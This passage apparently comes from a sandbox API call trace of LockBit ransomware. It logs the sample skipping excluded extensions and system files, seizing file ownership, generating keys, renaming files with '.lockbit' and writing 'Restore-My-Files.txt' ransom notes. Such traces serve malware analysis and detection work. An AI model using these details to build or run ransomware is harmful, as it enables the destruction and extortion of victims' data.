[0076.763] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0076.763] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0076.763] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0076.763] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0076.763] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui.lockbit") returned 58 [0076.763] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\wmm2clip.dll.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.765] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.765] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.765] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.765] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.766] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.766] RtlFreeAnsiString (AnsiString="\\") [0076.766] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6c530 | out: TokenHandle=0x3d6c530*=0x3a8) returned 0x0 [0076.766] malloc (_Size=0x200) returned 0x77d800 [0076.766] NtQueryInformationToken (in: TokenHandle=0x3a8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6c528 | out: TokenInformation=0x77d800, ReturnLength=0x3d6c528) returned 0x0 [0076.766] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6c2e4, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.766] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6c2e4, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.766] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.767] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.767] CloseHandle (hObject=0x3a8) returned 1 [0076.767] free (_Block=0x77d800) [0076.767] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\wmm2clip.dll.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a8 [0076.767] CreateIoCompletionPort (FileHandle=0x3a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.767] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.767] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=7168) returned 1 [0076.767] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.768] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0076.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.768] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0076.768] ReadFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.774] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.774] malloc (_Size=0x8a) returned 0x77d800 [0076.774] NtSetInformationFile (FileHandle=0x3a8, IoStatusBlock=0x3d6c2dc, FileInformation=0x77d800, Length=0x8a, FileInformationClass=0xa) returned 0xc0000008 [0076.776] free (_Block=0x77d800) [0076.776] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui" | out: pszPath="C:\\\\Program Files\\DVD Maker\\en-US") returned 1 [0076.776] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\en-US\\Restore-My-Files.txt") returned 54 [0076.776] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.776] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x520150, dwReserved1=0x0, cFileName="WMM2CLIP.dll.mui", cAlternateFileName="")) returned 0 [0076.776] FindClose (in: hFindFile=0x55fdf8 | out: hFindFile=0x55fdf8) returned 1 [0076.776] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd559b52d, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xd559b52d, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xddb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Eurosti.TTF", cAlternateFileName="")) returned 1 [0076.776] lstrcmpiW (lpString1=".", lpString2="Eurosti.TTF") returned -1 [0076.776] lstrcmpiW (lpString1="..", lpString2="Eurosti.TTF") returned -1 [0076.777] PathFindExtensionW (pszPath="Eurosti.TTF") returned=".TTF" [0076.777] lstrcmpiW (lpString1=".386", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".cmd", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".exe", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".ani", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".adv", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".theme", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".msi", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".msp", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".com", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".diagpkg", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".nls", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".diagcab", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".lock", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".ocx", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".mpa", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".cpl", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".mod", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".hta", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".icns", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".prf", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".rtp", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".diagcfg", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".msstyles", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".bin", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".hlp", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".shs", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".drv", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".wpx", lpString2=".TTF") returned 1 [0076.777] lstrcmpiW (lpString1=".bat", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".rom", lpString2=".TTF") returned -1 [0076.777] lstrcmpiW (lpString1=".msc", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".spl", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".ps1", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".msu", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".ics", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".key", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".mp3", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".reg", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".dll", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".ini", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".idx", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".sys", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".hlp", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".ico", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".lnk", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".rdp", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".lockbit", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Eurosti.TTF") returned 1 [0076.778] lstrcmpiW (lpString1="ntldr", lpString2="Eurosti.TTF") returned 1 [0076.778] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Eurosti.TTF") returned 1 [0076.778] lstrcmpiW (lpString1="bootsect.bak", lpString2="Eurosti.TTF") returned -1 [0076.778] lstrcmpiW (lpString1="autorun.inf", lpString2="Eurosti.TTF") returned -1 [0076.778] lstrcmpiW (lpString1="thumbs.db", lpString2="Eurosti.TTF") returned 1 [0076.778] lstrcmpiW (lpString1="iconcache.db", lpString2="Eurosti.TTF") returned 1 [0076.778] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker" | out: pszPath="C:\\\\Program Files\\DVD Maker\\") returned="" [0076.778] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Eurosti.TTF") returned=".TTF" [0076.778] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0076.778] lstrcmpiW (lpString1=".7z", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".ckp", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".dacpac", lpString2=".TTF") returned -1 [0076.778] lstrcmpiW (lpString1=".db", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".db-shm", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".db-wal", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".db3", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".dbc", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".dbs", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".dbt", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".dbv", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".frm", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".mdf", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".mrg", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".mwb", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".myd", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".ndf", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".qry", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".sdb", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".sdf", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".sql", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".sqlite", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".sqlite3", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".sqlitedb", lpString2=".TTF") returned -1 [0076.779] lstrcmpiW (lpString1=".tmd", lpString2=".TTF") returned -1 [0076.779] wsprintfW (in: param_1=0x3d6cae0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Eurosti.TTF.lockbit") returned 47 [0076.779] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Eurosti.TTF" (normalized: "c:\\program files\\dvd maker\\eurosti.ttf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.780] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.780] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.780] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.780] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.781] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.781] RtlFreeAnsiString (AnsiString="\\") [0076.781] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6d158 | out: TokenHandle=0x3d6d158*=0x16c) returned 0x0 [0076.781] malloc (_Size=0x200) returned 0x77d800 [0076.781] NtQueryInformationToken (in: TokenHandle=0x16c, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6d150 | out: TokenInformation=0x77d800, ReturnLength=0x3d6d150) returned 0x0 [0076.781] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6cf0c, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.781] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6cf0c, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.781] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Eurosti.TTF", SecurityInformation=0x1, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.781] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Eurosti.TTF", SecurityInformation=0x4, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.782] CloseHandle (hObject=0x16c) returned 1 [0076.782] free (_Block=0x77d800) [0076.782] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Eurosti.TTF" (normalized: "c:\\program files\\dvd maker\\eurosti.ttf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x16c [0076.782] CreateIoCompletionPort (FileHandle=0x16c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.782] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.782] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=56760) returned 1 [0076.782] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.783] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0076.783] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.783] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0076.783] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.788] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Eurosti.TTF.lockbit", NtPathName=0x3d6d138, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Eurosti.TTF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.788] malloc (_Size=0x74) returned 0x77d800 [0076.789] NtSetInformationFile (FileHandle=0x16c, IoStatusBlock=0x3d6cf04, FileInformation=0x77d800, Length=0x74, FileInformationClass=0xa) returned 0x0 [0076.792] free (_Block=0x77d800) [0076.792] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Eurosti.TTF" | out: pszPath="C:\\\\Program Files\\DVD Maker") returned 1 [0076.792] wsprintfW (in: param_1=0x3d6ccf0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt") returned 48 [0076.792] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.792] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0x0, dwReserved1=0x0, cFileName="fieldswitch.ax", cAlternateFileName="")) returned 1 [0076.792] lstrcmpiW (lpString1=".", lpString2="fieldswitch.ax") returned -1 [0076.792] lstrcmpiW (lpString1="..", lpString2="fieldswitch.ax") returned -1 [0076.792] PathFindExtensionW (pszPath="fieldswitch.ax") returned=".ax" [0076.792] lstrcmpiW (lpString1=".386", lpString2=".ax") returned -1 [0076.792] lstrcmpiW (lpString1=".cmd", lpString2=".ax") returned 1 [0076.792] lstrcmpiW (lpString1=".exe", lpString2=".ax") returned 1 [0076.792] lstrcmpiW (lpString1=".ani", lpString2=".ax") returned -1 [0076.792] lstrcmpiW (lpString1=".adv", lpString2=".ax") returned -1 [0076.792] lstrcmpiW (lpString1=".theme", lpString2=".ax") returned 1 [0076.792] lstrcmpiW (lpString1=".msi", lpString2=".ax") returned 1 [0076.792] lstrcmpiW (lpString1=".msp", lpString2=".ax") returned 1 [0076.792] lstrcmpiW (lpString1=".com", lpString2=".ax") returned 1 [0076.792] lstrcmpiW (lpString1=".diagpkg", lpString2=".ax") returned 1 [0076.792] lstrcmpiW (lpString1=".nls", lpString2=".ax") returned 1 [0076.792] lstrcmpiW (lpString1=".diagcab", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".lock", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".ocx", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".mpa", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".cpl", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".mod", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".hta", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".icns", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".prf", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".rtp", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".diagcfg", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".msstyles", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".bin", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".shs", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".drv", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".wpx", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".bat", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".rom", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".msc", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".spl", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".ps1", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".msu", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".ics", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".key", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".mp3", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".reg", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".dll", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".ini", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".idx", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".sys", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.793] lstrcmpiW (lpString1=".ico", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".lnk", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".rdp", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".lockbit", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="fieldswitch.ax") returned 1 [0076.794] lstrcmpiW (lpString1="ntldr", lpString2="fieldswitch.ax") returned 1 [0076.794] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="fieldswitch.ax") returned 1 [0076.794] lstrcmpiW (lpString1="bootsect.bak", lpString2="fieldswitch.ax") returned -1 [0076.794] lstrcmpiW (lpString1="autorun.inf", lpString2="fieldswitch.ax") returned -1 [0076.794] lstrcmpiW (lpString1="thumbs.db", lpString2="fieldswitch.ax") returned 1 [0076.794] lstrcmpiW (lpString1="iconcache.db", lpString2="fieldswitch.ax") returned 1 [0076.794] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker" | out: pszPath="C:\\\\Program Files\\DVD Maker\\") returned="" [0076.794] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\fieldswitch.ax") returned=".ax" [0076.794] lstrcmpiW (lpString1=".rar", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".zip", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".7z", lpString2=".ax") returned -1 [0076.794] lstrcmpiW (lpString1=".ckp", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".dacpac", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".db", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".db-shm", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".db-wal", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".db3", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".dbf", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".dbc", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".dbs", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".dbt", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".dbv", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".frm", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".mdf", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".mrg", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".mwb", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".myd", lpString2=".ax") returned 1 [0076.794] lstrcmpiW (lpString1=".ndf", lpString2=".ax") returned 1 [0076.795] lstrcmpiW (lpString1=".qry", lpString2=".ax") returned 1 [0076.795] lstrcmpiW (lpString1=".sdb", lpString2=".ax") returned 1 [0076.795] lstrcmpiW (lpString1=".sdf", lpString2=".ax") returned 1 [0076.795] lstrcmpiW (lpString1=".sql", lpString2=".ax") returned 1 [0076.795] lstrcmpiW (lpString1=".sqlite", lpString2=".ax") returned 1 [0076.795] lstrcmpiW (lpString1=".sqlite3", lpString2=".ax") returned 1 [0076.795] lstrcmpiW (lpString1=".sqlitedb", lpString2=".ax") returned 1 [0076.795] lstrcmpiW (lpString1=".tmd", lpString2=".ax") returned 1 [0076.795] wsprintfW (in: param_1=0x3d6cae0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\fieldswitch.ax.lockbit") returned 50 [0076.795] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\fieldswitch.ax" (normalized: "c:\\program files\\dvd maker\\fieldswitch.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.796] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.797] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.797] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.797] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.797] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.797] RtlFreeAnsiString (AnsiString="\\") [0076.797] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6d158 | out: TokenHandle=0x3d6d158*=0x16c) returned 0x0 [0076.797] malloc (_Size=0x200) returned 0x77d800 [0076.797] NtQueryInformationToken (in: TokenHandle=0x16c, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6d150 | out: TokenInformation=0x77d800, ReturnLength=0x3d6d150) returned 0x0 [0076.797] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6cf0c, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.798] 